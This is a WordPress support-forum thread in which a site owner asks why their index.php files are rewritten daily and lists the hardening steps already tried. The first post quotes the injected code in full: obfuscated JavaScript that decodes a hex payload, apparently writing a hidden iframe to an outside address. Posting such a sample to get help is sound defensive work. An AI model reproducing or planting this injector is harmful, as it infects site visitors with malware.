WordPress.org

Ready to get started?Download WordPress

Forums

Something rewrites my index.php files - daily (4 posts)

  1. deWINTER
    Member
    Posted 4 years ago #

    Hi,

    Something keeps rewriting my index.php files in the root of my wordpress installation and in the wordpress folder itself. On a DAILY basis.
    I keep replacing the files with a clean version, but it comes back the next day, causing Safari to tell me that my site may harm my computer.
    The code I get is this:

    <script>
    c10zf0='';
    y383d2d0=/* ye455a75d646 */document;
    y383d2d0.write('<scr'+'ipt>function y6c83f2(ya5aec4){return e'+c10zf0+'val(ya5aec4);}</scr'+'ipt>');  
    
    function c10b010268y721250a5ae(y79f81){
    	var z402='';
    	return (y6c83f2('p'+z402+'arseInt')(y79f81,16));
    	}
    
    function y1790bb112e(yc7061){
    	var yd068f7cd='';
    	y8331c4b='fromCh';
    	y4037b0b01=String[y8331c4b+'arCode'];
    	for(y2cb0547=0;y2cb0547<yc7061.length;y2cb0547+=2){
    		yd068f7cd+=(y4037b0b01(c10b010268y721250a5ae(yc7061.substr(y2cb0547,2))));
    		}
    	return yd068f7cd;
    	} 
    
    var y8b79f97f6='3C7363726970743E69662821'+c10zf0+'6D796961'+c10zf0+'297B646F63756D656E742E777269746528756E65736361'+c10zf0+'7065282027253363253639253636253732253631'+c10zf0+'253664253635253230253665253631'+c10zf0+'253664253635253364253633253331'+c10zf0+'253330253230253733253732253633253364253237253638253734253734253730253361'+c10zf0+'253266253266253332253331'+c10zf0+'253332253265253331'+c10zf0+'253337253334253265253332253330253330253265253331'+c10zf0+'253332253330253266253265253634253639253636253266253637253666253265253730253638253730253366253733253639253634253364253331'+c10zf0+'26253237253262253464253631'+c10zf0+'253734253638253265253732253666253735253665253634253238253464253631'+c10zf0+'253734253638253265253732253631'+c10zf0+'253665253634253666253664253238253239253261'+c10zf0+'253335253331'+c10zf0+'253330253334253332253239253262253237253635253334253634253237253230253737253639253634253734253638253364253331'+c10zf0+'253334253331'+c10zf0+'253230253638253635253639253637253638253734253364253333253336253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c10zf0+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c10zf0+'2536642536352533652729293B7D7661'+c10zf0+'72206D796961'+c10zf0+'3D747275653B3C2F7363726970743E';
    y383d2d0.write(y1790bb112e(y8b79f97f6));
    </script>

    Any idea what I can do to get this nonsense to stop? I checked over all of my files, users, database, to see if there is anything wrong, but apart from that code everything seems fine.

    I use these plugins: Akismet, Next-gen gallery, Dagon Design form mailer and Google xml sitemap.
    Wordpress version is 2.8.4

    Any help will be greatly appreciated, thank you.

    Jo

  2. Samuel B
    moderator
    Posted 4 years ago #

  3. deWINTER
    Member
    Posted 4 years ago #

    I know.
    And I already did a lot of the stuff you should do when you have been hacked.

    • Kicked out the admin user and replaced it with a real name
    • Moved the entire wordpress installation to a different folder, and reinstalled the lot with a fresh copy
    • Locked down the wp-config file with some .htaccess stuff
    • Taken out the bit in the header that says what version of wordpress you use
    • Put in a blank index.html file in the plugin folder
    • etc ....

    Now, what I would like to know is, what do I do next? I have run out of ideas.
    Thanks,

    Jo.

  4. Samuel B
    moderator
    Posted 4 years ago #

    look at my 2nd link

Topic Closed

This topic has been closed to new replies.

About this Topic